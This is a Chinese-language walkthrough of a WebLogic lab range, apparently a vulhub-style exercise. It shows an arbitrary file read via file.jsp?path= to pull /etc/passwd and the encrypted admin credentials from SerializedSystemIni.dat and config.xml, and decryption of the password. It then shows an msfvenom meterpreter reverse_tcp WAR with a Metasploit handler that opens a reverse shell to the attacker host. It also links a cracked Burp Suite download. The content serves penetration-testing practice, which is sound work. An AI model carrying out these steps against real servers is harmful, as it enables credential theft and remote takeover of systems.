Weblogic 弱口令-任意文件读取

前言: Weblogic weak_password(靶场)

• 攻击机   KaliLinux 172.16.5.208
• 靶机       Ubuntu 192.168.247.139

任务一 启动环境 

cd weblogic/
cd weak_password
docker compose up -d
docker ps

 

任务二  部署

http://192.168.247.139:7001/console     //部署weblogic (第一次进入需要)

利用弱口令登入数次后无果，这里就要用到别的漏洞了

任务三 

http://192.168.247.139:7001/hello/file.jsp?path=/etc/passwd密文绝对路径:/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat相对路径:security/SerializedSystemIni.dat密钥绝对路径:/root/Oracle/Middleware/user _projects/domains/base domain/config/co
nfig.xml，相对路径:config/config.xml

//读取该接口存在任意文件读取

//这里我们直接去读取密文的文件，然后再去读取密钥文件，密文是用了AES加密的（用BP去抓）
https://www.52pojie.cn/thread-2005151-1-1.html（BP破解版）

//先去访问这个接口,捕获到了数据包，ctrl+r 发送到repeater模块
http://192.168.247.139:7001/hello/file.jsp?path=/etc/passwd

/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat         //修改成密文的路径
//HEX 就会看到这段

 

选中-> 复制到文件 -> key.dat

 

//接下来再去读取密钥
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

//密钥和密文都有了，现在去解密
https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi/releases/tag/v2.0

//运行该环境需要java环境
JDK 8u451 for Windows x64 (64位)
https://download.oracle.com/otn/java/jdk/8u451-b13/jdk-8u451-windows-x64.exe
JDK 8u451 for Windows x86 (32位)
https://download.oracle.com/otn/java/jdk/8u451-b13/jdk-8u451-windows-i586.exe

 

 

任务四 上传shell war包

//先确定网络可以正常ping通

//生成war
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.247.138 lport=5555 -f war -o java.war

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.247.138
set lport 5555
run

任务五 部署 

 

 

然后一直下一步-》安装

//访问这个路径
http://192.168.247.139:7001/java
//msf有反应成功了

 

任务六 实验结束关闭